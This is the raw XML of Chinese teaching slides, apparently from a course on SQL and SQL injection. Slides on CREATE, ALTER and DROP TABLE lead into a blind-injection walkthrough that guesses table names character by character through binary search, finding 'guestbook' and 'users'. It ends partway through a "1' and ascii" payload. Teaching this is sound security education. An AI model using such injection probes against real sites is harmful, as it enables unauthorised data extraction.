                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68C5702-B8FD-4A2A-888D-F0A7DC405A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4690994" y="3730572"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F8C25F-76B3-4B07-A0FC-7057DDA3AB8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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BACBB391-828B-4972-95AA-024FCDE56B20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941111" y="2063504"/>
              <a:ext cx="1107996" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>创建新表</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="组合 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6538B41E-0B0C-4BDF-AB6A-57C84EC0328D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5287508" y="4624437"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F5CA87A-5532-4AB5-AA30-0B92D6F7C2C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1092F1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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4" name="矩形 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C940B97-1A9D-47F1-B8EA-FEE05B03F298}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2894293" y="2063504"/>
              <a:ext cx="1743875" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ALTER TABLE </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622B0685-BF60-40C4-9ED0-BB2575227019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7723233" y="4666676"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56677E7E-BD86-4F7F-A617-D41F43A22158}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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DF8F5701-F884-48A7-BA1B-CA1F87258DB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5248613" y="2063504"/>
              <a:ext cx="2492991" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>变更（改变）数据库表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBA15B8-0E0D-4FA2-9D1A-AB9F72043902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2255269" y="5574683"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="矩形 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81953681-67D5-4755-8DFB-795028869552}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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50" name="矩形 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF00D6D-01FC-4F38-A2F2-C2D7E64A5439}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2945525" y="2063504"/>
              <a:ext cx="1641411" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>DROP TABLE </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861895D8-48D7-46DD-9673-74C54A73D8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4690994" y="5616922"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="矩形 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D9DD85-6142-40A3-B2FB-D0EB5546D13D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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B4D7AC4D-C4BF-4C46-B333-C747273FBD96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6022062" y="2063504"/>
              <a:ext cx="946092" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>删除表 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3748883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1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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fade">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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fade">
                                      <p:cBhvr>
                                        <p:cTn id="5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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="445031"/>
            <a:ext cx="11161240" cy="506998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>接下来，继续用二分法来猜测表名。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100"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C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2432931" y="5704557"/>
            <a:ext cx="8352928" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明第一个表的名字的第一个字符为小写字母</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>重复上述步骤，即可猜解出两个表名（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>guestbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2654826249"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="886645" y="1312069"/>
          <a:ext cx="11303370" cy="4219082"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11303370">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4219082">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
